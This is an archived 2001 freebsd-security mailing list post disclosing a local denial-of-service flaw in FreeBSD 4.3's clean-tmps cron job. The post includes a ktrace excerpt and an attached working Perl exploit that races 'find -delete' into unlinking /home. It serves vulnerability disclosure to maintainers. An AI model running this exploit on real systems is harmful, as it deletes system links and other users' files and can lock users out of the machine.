From owner-freebsd-security Fri May 25 10: 3:38 2001 Delivered-To: freebsd-security@freebsd.org Received: from mailhost1.dircon.co.uk (mailhost1.dircon.co.uk [194.112.32.65]) by hub.freebsd.org (Postfix) with ESMTP id 64E8C37B423 for ; Fri, 25 May 2001 10:03:33 -0700 (PDT) (envelope-from nick@cleaton.net) Received: from laptop (desk77.ch.dircon.net [195.157.3.77]) by mailhost1.dircon.co.uk (8.9.3/8.9.3) with ESMTP id SAA80671 for ; Fri, 25 May 2001 18:03:32 +0100 (BST) Received: (from nick@localhost) by laptop (8.9.3/8.9.3) id SAA00526 for security@freebsd.org; Fri, 25 May 2001 18:03:54 +0100 Date: Fri, 25 May 2001 18:03:54 +0100 From: Nick Cleaton To: security@freebsd.org Subject: 4.3 Security: local DoS via clean-tmps Message-ID: <20010525180354.A434@lt1.cleaton.net> Mime-Version: 1.0 Content-Type: multipart/mixed; boundary="VbJkn9YxBvnuCH5J" Content-Disposition: inline User-Agent: Mutt/1.2.5i Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org --VbJkn9YxBvnuCH5J Content-Type: text/plain; charset=us-ascii Content-Disposition: inline Tested in 4.3-RELEASE only: If /etc/periodic/daily/clean-tmps is enabled, then it's possible for any local user to trick it into calling unlink() or rmdir() on anything in the root directory. The problem is that "find -delete" can be made to do chdir("..") multiple times followed by unlink() and/or rmdir(). 588 find CALL chdir(0x280e227d) 588 find NAMI ".." 588 find RET chdir 0 588 find CALL chdir(0x280e227d) 588 find NAMI ".." 588 find RET chdir 0 588 find CALL chdir(0x280e227d) 588 find NAMI ".." 588 find RET chdir 0 588 find CALL chdir(0x280e227d) 588 find NAMI ".." 588 find RET chdir 0 588 find CALL unlink(0x8051440) 588 find NAMI "sys" This means it can be tricked into going up too high by moving its current directory higher up the hierarchy, by for example doing "mv /tmp/1/2/3 /tmp/4" while find's working directory is somewhere under "/tmp/1/2/3". The attached exploit will cause it to delete the /home -> /usr/home symlink. I think this would render it impossible to log into a system configured for non-root ssh access via DSA key only. This could also be used to unlink other users' files in /tmp without regard to their age. -- Nick Cleaton nick@cleaton.net --VbJkn9YxBvnuCH5J Content-Type: text/plain; charset=us-ascii Content-Disposition: attachment; filename=ditch #!/usr/bin/perl5 -w use strict; # The thing in / that we want to unlink. my $target = 'home'; ###################################################### use Fatal qw(mkdir chdir open utime rename link); chdir '/tmp'; mkdir 'x47', 0755; chdir 'x47'; mkdir 'foo', 0755; oldfile($target); chdir 'foo'; mkdir 'bar', 0755; chdir 'bar'; mkdir 'tree', 0755; chdir 'tree'; oldfile('trigger'); mkdir 'big', 0755; # build something that will take a while to tear down chdir 'big'; for my $f (1..50) { oldfile($f); for my $l (1..100) { link $f, "$f.$l"; } } chdir '..'; print "waiting for the cron job...\n"; fork and exit; while (-r 'trigger') { select undef, undef, undef, 0.1; } rename '/tmp/x47/foo/bar/tree', '/tmp/x48'; sub oldfile { my $file = shift; open OUT, ">$file"; utime 0, 0, $file; } --VbJkn9YxBvnuCH5J-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message